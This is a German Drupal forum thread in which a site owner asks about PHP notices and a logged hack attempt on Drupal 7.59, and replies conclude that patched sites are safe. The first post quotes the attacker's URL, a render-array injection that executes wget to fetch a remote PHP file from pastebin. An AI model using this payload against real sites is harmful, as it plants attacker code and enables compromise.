[gelöst] Notices warnings und hack attempt in Drupal 7.59
am 30.05.2018 - 20:49 Uhr in
Ich habe seit einigen Tagen in den Protokollberichten einige dieser Warnungen, die mit PHP angezeigt werden oder Zugriff verweigert.
https://www.drupal.org/project/drupal/issues/2975433
Notice: Undefined index: #prefix in file_ajax_upload() (line 287 of /var/www/html/modules/file/file.module)
, plus 3 - 4 weitere Meldungen, die sich auf ajax beziehen
und
https://www.drupal.org/forum/support/post-installation/2018-04-24/hack-a...
https://www.example.com/?q=user/password&name[%23post_render][]=exec&name[%23markup]=wget+-O+misc%2fAuthCommon.php+https%3a%2f%2fpastebin.com%2fraw%2fmibqDZX4&name[%23type]=markup
Kann jemand helfen, ich werde aus den Issues nicht schlau ob man was unternehmen muß? Was genau steht da soll man tun?
Module und Core sind natürlich auf neuestem Stand.
Ich kann keine Veränderung in den FTP Dateien feststellen, auch sonst läuft die Seite normal, trotzdem nervt das.
Die IP's zu diesen Zugriffen habe ich umgehend gesperrt.
Ja, liebe DSGVO... genau für so etwas braucht man Zugriff auf die IP, um die Sicherheit der Seite zu erhalten und das werde ich auch mit "Sicherheit" nicht ändern...
Grüße Jenna
- Anmelden oder Registrieren um Kommentare zu schreiben
Wie ich es verstehe, soll man
am 30.05.2018 - 21:09 Uhr
Wie ich es verstehe, soll man überhaupt nichts tun.
Man teilt in den Issues mehr die Info, dass es sich um Hack-Versuche handelt.
Die Versuche waren wahrscheinlich erfolglos, wenn du rechtzeitig upgedatet hattest.
In dem einen Issue meint ja einer, sollte man lieber die Notices ausblenden, weil das das Log zuspammt.
Vermutlich wirst du aktuell selber ein Modul schreiben müssen, wenn du die Sachen nicht geloggt haben willst.
Ich persönlich würde lieber den Spam akzeptieren und merken, dass jemand mich zu hacken versucht.
Ich habe immer so viel Error Spam durch aus Faulheit nicht gefixte Fehler in meinem eigenen Code, dass das den Braten auch nicht mehr fett macht...
Die Meldungen sind rapide
am 10.07.2018 - 16:20 Uhr
Die Meldungen sind rapide zurück gegangen, da ich die IPs händisch sperre.. nur ganz vereinzelt taucht noch mal so ein Versuch auf.
Ich halte auch nichts davon Notices auszublenden, lieber etwas Handarbeit und man hat langfristig Ruhe..
Vielen Dank für deine Info (Updates hatte ich natürlich auch durchgeführt)
Grüße Jenna